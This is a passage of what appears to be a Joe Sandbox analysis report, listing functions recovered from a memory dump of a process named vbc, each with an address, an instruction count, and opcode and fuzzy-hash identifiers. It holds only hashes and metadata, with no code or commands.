                                                                                    • API String ID:
                                                                                    • Opcode ID: 5c0ee203a52f2cb6d95a264fa07ead456084afad801a28caf3811351939b2eac
                                                                                    • Instruction ID: f8694d9ea40d140a9b485dbd1691270b5300544e40a8deb04d96029edf8a48ff
                                                                                    • Opcode Fuzzy Hash: 5c0ee203a52f2cb6d95a264fa07ead456084afad801a28caf3811351939b2eac
                                                                                    • Instruction Fuzzy Hash: A0218E71614B04EFDB20CF69C881FA6B3F9FF44254F44892DE89AC7250EA70AC40CBA4
                                                                                    Function 058B66B0 Relevance: .1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 25c950967dc69ed713295b77655f86de2b4cb76cb3013d7cbc04c6c3af17e87c
                                                                                    • Instruction ID: 5584bda5a82a77bbeced5b11f7b10b2d0831e5e96139862be41b74324526d094
                                                                                    • Opcode Fuzzy Hash: 25c950967dc69ed713295b77655f86de2b4cb76cb3013d7cbc04c6c3af17e87c
                                                                                    • Instruction Fuzzy Hash: 3311B276A012459BDB24CF5AC580D9ABBE9AB84650F15417AED05DB310EA70DD00CB94
                                                                                    Function 05882F12 Relevance: .1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c35155a539c524482268d197c688b9fddde74c0891665e8ff20870758aa5ac9e
                                                                                    • Instruction ID: 09d4531328e2bcec192ee01502d0032cb40ac62c0af51bceb9d6b4cd97f50af4
                                                                                    • Opcode Fuzzy Hash: c35155a539c524482268d197c688b9fddde74c0891665e8ff20870758aa5ac9e
                                                                                    • Instruction Fuzzy Hash: 5D1125353087146BD634B72DD889F36AB95EB80EA4F580027FE47D7284D9B0DC04C6A6
                                                                                    Function 0590E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                    • Instruction ID: b518c65e169385c4cec0edd2704518404411c504eca7c3e3194df8cd6a4894b2
                                                                                    • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                    • Instruction Fuzzy Hash: 4B119E32604604EFDB219F44C844B6AB7AEFF45750F059C28EC4ADB1A0EB39EC40DB90
                                                                                    Function 058A27ED Relevance: .1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4e5a5c7f1584b9ddcd1f22ed46248fd3bbb24b761c68c8a6396da28b9409ceff
                                                                                    • Instruction ID: 7644578412d78fd2fc09c41338ea252766d409f93092fc3c4476c3c024b4cea7
                                                                                    • Opcode Fuzzy Hash: 4e5a5c7f1584b9ddcd1f22ed46248fd3bbb24b761c68c8a6396da28b9409ceff
                                                                                    • Instruction Fuzzy Hash: F5010476309648ABF32AA26D988DF377A9EEF82755F090061FC02DB240DA24DC00C2A1
                                                                                    Function 05884690 Relevance: .1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 84c4dbdfc846cae02510397e5415faaf9d671133a0740cbe4b28b07c8fa4e620
                                                                                    • Instruction ID: 47ff8ca407241ab5ceeb819ab6cba16c82f530c191f0a5f16a49271d4e03d90a
                                                                                    • Opcode Fuzzy Hash: 84c4dbdfc846cae02510397e5415faaf9d671133a0740cbe4b28b07c8fa4e620
                                                                                    • Instruction Fuzzy Hash: 27118C36204A4AAFDF25EA59D944F667BA5EB85B68F044129FC05CB260C774EC40CF60
                                                                                    Function 058B6620 Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3de94d9128dd2bc5bcfb15acb415a6c0e0dffd2188f9a5a501c939f5131f053e
                                                                                    • Instruction ID: b7756079dd9776b3e7977064b12b37f569e1ffa93370d2eb081f5832888815e2
                                                                                    • Opcode Fuzzy Hash: 3de94d9128dd2bc5bcfb15acb415a6c0e0dffd2188f9a5a501c939f5131f053e
                                                                                    • Instruction Fuzzy Hash: C311A072A00714ABEB21EB5AC980B9EF7BCFF89640F540455DD05E7300EB70AD018B91
                                                                                    Function 058AE53E Relevance: .1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                    • Instruction ID: 0622e31acda66d5468e5f0aec57226ce67d36b022870d2bc1d07797cce2da1f8
                                                                                    • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                    • Instruction Fuzzy Hash: FD11A1723066C59BEB229728D968B3577E9BB4275CF1D08E0DE41DB692F728CC42C351
                                                                                    Function 0590E75D Relevance: .1, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                    • Instruction ID: fb0c2724cfde3e8fba853b521d13c953a7783ed9b7833c282c7b75c8ea9fd554
                                                                                    • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                    • Instruction Fuzzy Hash: 81019632704605AFDB259F54C804F7AB6ADFF85750F099C28E9069B1A0E771DD40C790
                                                                                    Function 0587A250 Relevance: .1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                    • Instruction ID: 5957a7dec93db353e0c521b528f3778b11a4bfe809ad3def78c3d8b9c829e854
                                                                                    • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                    • Instruction Fuzzy Hash: 4F01D272515B199BCB398F19D840A7A7BA6FF55B607008A2DFC96DB680D731DC40CBA0
                                                                                    Function 058FE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 12013e338a9097e78dfdb9abdf510d185334b9f0f2d6073949995406842b8413
                                                                                    • Instruction ID: 681935491a78aaa5ad2d10728bfbd0e3de8d44e4ef6dfdd3518f746bacd6bf87
                                                                                    • Opcode Fuzzy Hash: 12013e338a9097e78dfdb9abdf510d185334b9f0f2d6073949995406842b8413
                                                                                    • Instruction Fuzzy Hash: 36117932241740EFCB15AF18C985F1ABBB8FF48B44F2400A5FE05DB661D635ED01CA90
                                                                                    Function 05886259 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6c98638ca50bf011c459c7a4e76484e15763ae29fa7773d10abd2f71501d6a93
                                                                                    • Instruction ID: ad6ec28db5d660b1fbf74296d2b80902d1100d8fa5038dcee54ca1aaffca91b3
                                                                                    • Opcode Fuzzy Hash: 6c98638ca50bf011c459c7a4e76484e15763ae29fa7773d10abd2f71501d6a93
                                                                                    • Instruction Fuzzy Hash: AF119A71601228ABEB25EB28CD46FE9B674FB04710F5041D8AB19E61E0DB709E81CF85
                                                                                    Function 058B6DA0 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                    • Instruction ID: 3bc156e0e3a5738c60c4712805ecb1b5dee9b33e18a08c6b26d114bb3f768cb0
                                                                                    • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                    • Instruction Fuzzy Hash: 1301F572608215A7EF299A96C805BDB7F6DEB80B50F244015AD46DB390F6B4DC80C3E1
                                                                                    Function 05876DF6 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9117f481185913a947b4a61b93c783def06aed9b838ae10e9fb212a0ad0d956c
                                                                                    • Instruction ID: 4f2ebd05caaa53338a42f222a11f9ef9156321bf9f47d7b467cb0342d2a6a0ad
                                                                                    • Opcode Fuzzy Hash: 9117f481185913a947b4a61b93c783def06aed9b838ae10e9fb212a0ad0d956c
                                                                                    • Instruction Fuzzy Hash: FA01B13271470AABCB50AB699845867B7E6FF84324B010529FD85C3691DF61EC10D6E1
                                                                                    Function 05916500 Relevance: .0, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f9ae285403aa5bf94b7466bb463cf82d80db6257b8eadd3650d63102a1e62f1
                                                                                    • Instruction ID: 28e762ce6fd32d1ee3e100ad893a7132f38e7e9e612f6597f7a97cbb80d7ba5f
                                                                                    • Opcode Fuzzy Hash: 5f9ae285403aa5bf94b7466bb463cf82d80db6257b8eadd3650d63102a1e62f1
                                                                                    • Instruction Fuzzy Hash: 6E11C472A441599FD711CF59D800BA6BBBAFF9A314F098159EC49CB715D732EC80CBA0
                                                                                    Function 0588208A Relevance: .0, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                    • Instruction ID: 4dd18a76ef3410c67b1d010914d393a3e2c2515341049b4f31f8094210e854bd
                                                                                    • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                    • Instruction Fuzzy Hash: 0401F1366002148BEF14AA29D880EB2B7A7FFC4600F5945A5ED07CF246EA719C81D3A0
                                                                                    Function 05906050 Relevance: .0, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a11e55f088cb087ea9d287ffa350694315f561cc8ddd9f6cbfeb8585af3b06bf
                                                                                    • Instruction ID: 79dd055c56e6b169e99bdffb4377963f4f8d547f8a0d74909763300b602fc06d
                                                                                    • Opcode Fuzzy Hash: a11e55f088cb087ea9d287ffa350694315f561cc8ddd9f6cbfeb8585af3b06bf
                                                                                    • Instruction Fuzzy Hash: 0411177290011DABCB15DB99CC84DEFBB7DEF48254F044566A906E7210EB34EA14CBA1
                                                                                    Function 058BE5CF Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1497ec61cef921d03ff30a42738f700f6eaf80432cc0e03cd0e19bb5154039d5
                                                                                    • Instruction ID: 335bcbece5a56dba2c756579045f6bdab1cecd0465ac1a9f59993f9a47aeb5d3
                                                                                    • Opcode Fuzzy Hash: 1497ec61cef921d03ff30a42738f700f6eaf80432cc0e03cd0e19bb5154039d5
                                                                                    • Instruction Fuzzy Hash: A5018471301B047FD715BB6DCD84E57B7ACFB896647040525B909C3551DB34EC01C6E1
                                                                                    Function 058C20F0 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 015334a397645ef81baafc562721b0f844f7406fd38861b65f641f176936366d
                                                                                    • Instruction ID: 2160742672d5c51eac9fb3afc7beb48e95d292df27042405b291069485e396be
                                                                                    • Opcode Fuzzy Hash: 015334a397645ef81baafc562721b0f844f7406fd38861b65f641f176936366d
                                                                                    • Instruction Fuzzy Hash: FF116D35A0120CEFDF05EF64C855EAE7BB6EB88254F004099FD06DB290EA35EE51CB91
                                                                                    Function 0587C020 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                    • Instruction ID: a5122bd7e6d264008330a94c55cc937fd44d09fe6f169a8ad2a306bb898e034d
                                                                                    • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                    • Instruction Fuzzy Hash: D101B5322007099FEB22E669D804EA7B7EAFFC5254F044819ED46CB540DE74ED42CBA1
                                                                                    Function 0590C460 Relevance: .0, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd73f25cda852714f77210e8564cffb9115e6f629c12a945a16b6e8c67cf63bb
                                                                                    • Instruction ID: 1120847c7cc368b747d7e4e468e07ed5eec4c6bb45ad519a7812d0a60a9a4fa6
                                                                                    • Opcode Fuzzy Hash: cd73f25cda852714f77210e8564cffb9115e6f629c12a945a16b6e8c67cf63bb
                                                                                    • Instruction Fuzzy Hash: 8D115B71A0120CAFCF05EF68C854EAEBBBAFB88240F004559BC0197390DA34ED51CB90
                                                                                    Function 0589E016 Relevance: .0, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                    • Instruction ID: 93ec14dc91128ad8f462278b07b9469917bc86ce250b379b6093461711e06623
                                                                                    • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                    • Instruction Fuzzy Hash: A3012C72204684DFD72AD61DC948F36BBDDFB85B54F0D04A1ED06CBA91E668DC40C661
                                                                                    Function 0587826B Relevance: .0, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6e22aacb9d66cd8825c19f1632e3909d599e01972837faca90e3f5c42f6cdb6a
                                                                                    • Instruction ID: 819175bb58738e70e76a1a43b60ca23a131339d9fd28f9dfd655e6d4e819d02c
                                                                                    • Opcode Fuzzy Hash: 6e22aacb9d66cd8825c19f1632e3909d599e01972837faca90e3f5c42f6cdb6a
                                                                                    • Instruction Fuzzy Hash: 2B01F731B2460CDFC714EB69DC499AE77F9EF80220F554029AD02E7680EE30EC01DA91
                                                                                    Function 05904C0F Relevance: .0, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 74b12630b4e12dd85d65ed2575b64b1e33aeeaf46bd4b74fd57a73e3390c0070
                                                                                    • Instruction ID: 7953802b36a8f45baa3171ddc028935f014ffc069792061d4ee43f232fd19838
                                                                                    • Opcode Fuzzy Hash: 74b12630b4e12dd85d65ed2575b64b1e33aeeaf46bd4b74fd57a73e3390c0070
                                                                                    • Instruction Fuzzy Hash: C901F772B01315AFCF109F9DD9C1B99BBFCAB847A0F140059EA08D7240C7B0DD448754
                                                                                    Function 05882582 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2808078b04d4748392533e7517a1cf64ec0ddb7ecb4b384a10837ff02a0c5009
                                                                                    • Instruction ID: 8aba56834927e6f602f6874021911cd5790d5b89d482891387a87dbda8f73fa2
                                                                                    • Opcode Fuzzy Hash: 2808078b04d4748392533e7517a1cf64ec0ddb7ecb4b384a10837ff02a0c5009
                                                                                    • Instruction Fuzzy Hash: 88F0F932741B10B7C731DB5A8C44F27BAAAEB84F90F144428A906D7600CA30DD05DAA0
                                                                                    Function 05954F68 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b73be04372463d3c2e9631604b99cdcd6295f88c85bb26e3998b692a1a037749
                                                                                    • Instruction ID: a81e5a7c9769d03261f91349efd5912af3c28b9a13a621f0732a173f316955ea
                                                                                    • Opcode Fuzzy Hash: b73be04372463d3c2e9631604b99cdcd6295f88c85bb26e3998b692a1a037749
                                                                                    • Instruction Fuzzy Hash: ED0117B1A00209ABCB04DFA9D8559AEBBF8FF48304F10445AB905E7350DA74DA018BA1
                                                                                    Function 058AC073 Relevance: .0, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                    • Instruction ID: d26a864e4505500d1cbe5883a3129c0b2de7fe4f50b2d44df688f8fbced2de28
                                                                                    • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                    • Instruction Fuzzy Hash: A9F04FB3600A15ABD725CF4D9840E57F7EAEBC4A90F058169A955D7220EA31ED05CB90
                                                                                    Function 0587C310 Relevance: .0, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                    • Instruction ID: 2e6638a7decba7cf68f9cf71df8589adfb60f1a8ffb8ce2dd935d83f8ad3686e
                                                                                    • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                    • Instruction Fuzzy Hash: 36F02173345B3A9BD73296AD5844F3BB696DFC1A64F190035FD19DB204C964CC0157D1
                                                                                    Function 05954FE7 Relevance: .0, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ca27323679e43f9fe20564f72031f437d47483195710d37034d13235081c8e3
                                                                                    • Instruction ID: 01323895f4b06d3b23287f40b7cf787c443029b2b1ba3fbc54a3adf6fae59988
                                                                                    • Opcode Fuzzy Hash: 1ca27323679e43f9fe20564f72031f437d47483195710d37034d13235081c8e3
                                                                                    • Instruction Fuzzy Hash: 1F017171A0030C9BCB00DFA9D9959EEBBB8EF48310F10445AF905F7350DB34DA018BA1
                                                                                    Function 059561E5 Relevance: .0, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6f30d2f46da0c9a25caa112c1d5e0db82b9139b3d4edf9a51adc70bf0d08ed20
                                                                                    • Instruction ID: 86026646212b6515779c8983e761b57a49fead0f5806b3d8de13f73dc03723ca
                                                                                    • Opcode Fuzzy Hash: 6f30d2f46da0c9a25caa112c1d5e0db82b9139b3d4edf9a51adc70bf0d08ed20
                                                                                    • Instruction Fuzzy Hash: 56014F71A113499BCF04DFA9D855AEEBBB8EF48310F54405EF901EB290EB74EA01CB95
                                                                                    Function 059063C0 Relevance: .0, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                    • Instruction ID: 0846669c1ce84a511b9869b64f4ef483dd531c8c159d727ec622d4ee106bfac0
                                                                                    • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                    • Instruction Fuzzy Hash: 87F06D7220011DBFEF029F94CD80DAF7B7DEB48298B144124FA0196060D731DD21ABA0
                                                                                    Function 0590A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
